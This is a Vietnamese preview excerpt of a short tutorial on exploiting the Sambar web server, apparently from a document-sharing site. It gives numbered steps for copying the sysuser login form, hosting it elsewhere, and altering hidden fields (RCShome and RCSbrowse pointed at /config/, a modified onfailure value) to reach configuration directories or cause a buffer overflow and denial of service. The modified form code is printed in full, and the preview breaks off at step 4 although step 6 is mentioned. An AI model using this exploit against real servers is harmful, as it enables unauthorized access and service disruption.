Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (35.32 KB, 2 trang )
Lỗi tràn bộ đệm của Server Sambar :
trang này đã được đọc lần
CÁCH KHAI THÁC:
Bạn phải biết được đường dẫn (ở sambar là c:\sambar ) của form đăng nhập sysuser:
BƯỚC 1: đi tới đường dẫn của form đăng nhập sysuser, như
http://localhost/sysuser/index.stm.
BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename
thành something.html .
BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho
form và images , tất nhiên, form phải được connect đến đúng địa chỉ url của script server.
CODE
[FORM METHOD=POST ACTION="http://localhost/session/login"
onsubmit="return FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation.
[INPUT TYPE=hidden NAME="onfailure"
VALUE="http://localhost/sysuser/relogin.stm"]*bạn có thể thay đổi cái này để làm tăng việc tràn
bộ đệm giống như một script cgi (cái này có thể là tấn công bằng DoS)
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *Đây là vấn đề*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*Đây là vấn đề*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]
BƯỚC 4: bây giờ bạn có thể refresh và login, dùng một user và password hợp lệ nếu bạn muốn
chứng tỏ một lỗi nữa ở bước 6!